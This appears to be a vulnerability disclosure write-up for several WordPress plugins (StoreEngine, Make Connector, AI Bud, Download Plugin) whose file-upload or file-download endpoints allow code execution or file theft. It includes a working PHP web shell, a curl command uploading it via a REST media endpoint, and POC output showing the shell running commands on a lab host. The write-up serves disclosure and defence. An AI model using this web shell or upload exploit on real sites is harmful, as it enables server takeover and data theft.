CVE-2025-9216

The StoreEngine plugin contains a vulnerability in it’s CSV Import/Export feature that allows any authenticated user (subscriber, author, editor, etc.) to upload arbitrary files and gain remote code execution. The vulnerability stems from two security flaws: (1) the CSV import endpoint lacks proper file validation checks, permission checks, and only relies on nonce verification for security, and (2) the storeengine_nonce is exposed to ALL frontend users through the plugin’s JavaScript. This combination allows any authenticated user to extract the nonce from frontend pages and use it to upload PHP web shells via the storeengine_csv/import endpoint, effectively granting subscriber+ users the ability to execute arbitrary code on the server.

CVE-2025-9215

The StoreEngine plugin contains a vulnerability in its CSV Import/Export feature that allows any authenticated user (subscriber, author, editor, etc.) to download arbitrary files from the server, including sensitive system files, WordPress configuration files, and plugin source code. The vulnerability stems from the storeengine_csv/file_download endpoint lacking proper path sanitization and only relying on nonce verification for security, while the storeengine_nonce is exposed to ALL frontend users through the plugin’s JavaScript. Note: This vulnerability requires the CSV Import/Export addon to be enabled by an administrator. Once enabled, this combination allows any authenticated user to extract the nonce from frontend pages and use it to download any file on the server via path traversal attacks, effectively granting subscriber+ users access to sensitive system and application files.

CVE-2025-6085

The Make Connector plugin does not sanitize the file types in its REST API media uploads, allowing administrators or above to upload arbitrary files and potentially gain code execution on the server.

TL;DR Exploits

cat << 'EOF' > shello.php
<?php    
    // Silence is golden
    if (!empty($_GET['cmd'])) {
        echo "<pre>".shell_exec($_GET["cmd"])."</pre>";
    }
?>
EOF

curl -k -X POST https://lab1.hacker/wp-json/wp/v2/media \
  -H "IWC-API-KEY: YOURFRIENDLYKEYHERE" \
  -F "file=@shello.php" \
  -F "title=Hacker World" \
  -F "description=A test file" \
  -F "caption=Hacker Caption" \

Leveraging the shell once it’s in the uploads folder:

CVE-2025-23968

The AI Bud plugin exposes a REST API endpoint /wp-json/ai-buddy/v1/wp/attachments that allows uploading files to the WordPress media library. The endpoint’s file logic contains file renaming functionality that triggers after file type validation, and allows the attacker to rename the uploaded file to any extension (including.php) allowing administrators or above to upload arbitrary files and potentially gain code execution on the server.

TL;DR Exploits

A POC cve-2025-23968.py is provided to demonstrate an administrator uploading a web shell named shell.php.

CVE-2025-6586

The Download Plugin does not sanitize the file types of the dpwap_plugin_locInstall function exposed via the mul_upload admin page, allowing administrators or above to upload arbitrary files and potentially gain code execution on the server.

TL;DR Exploits

A POC cve-2025-6586.py is provided to demonstrate an administrator uploading a web shell named shell.php.

python3 cve-2025-6586.py https://lab1.hacker admin PASSWORD
Logging into: https://lab1.hacker/wp-admin
Extracting nonce values...
Uploading web shell: shell.php
Web Shell Location: https://lab1.hacker/wp-
content/uploads/dpwap_logs/files/tmp/shell.php

Executing test command: ip addr
    <pre>1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN
group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
        valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
        valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP
group default qlen 1000
    link/ether 08:00:27:5b:34:2f brd ff:ff:ff:ff:ff:ff
    altname enp0s3
    inet 10.0.2.15/24 metric 100 brd 10.0.2.255 scope global dynamic eth0
v       alid_lft 75221sec preferred_lft 75221sec
    inet6 fd17:625c:f037:2:a00:27ff:fe5b:342f/64 scope global dynamic
mngtmpaddr noprefixroute
        valid_lft 86354sec preferred_lft 14354sec
    inet6 fe80::a00:27ff:fe5b:342f/64 scope link
        valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP
group default qlen 1000
    link/ether 08:00:27:39:ea:eb brd ff:ff:ff:ff:ff:ff
    altname enp0s8
    inet 192.168.56.56/24 brd 192.168.56.255 scope global eth1
        valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe39:eaeb/64 scope link
        valid_lft forever preferred_lft forever
4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue
state DOWN group default
    link/ether 02:42:77:47:94:a5 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
        valid_lft forever preferred_lft forever
</pre>

Details

The dpwap_plugin_multiple_upload_func function is exposed in the mul_upload admin page. On line 80 of /wp-content/plugins/download-plugin/app/Plugins/Base.php the function includes multiple_upload_plugin.php.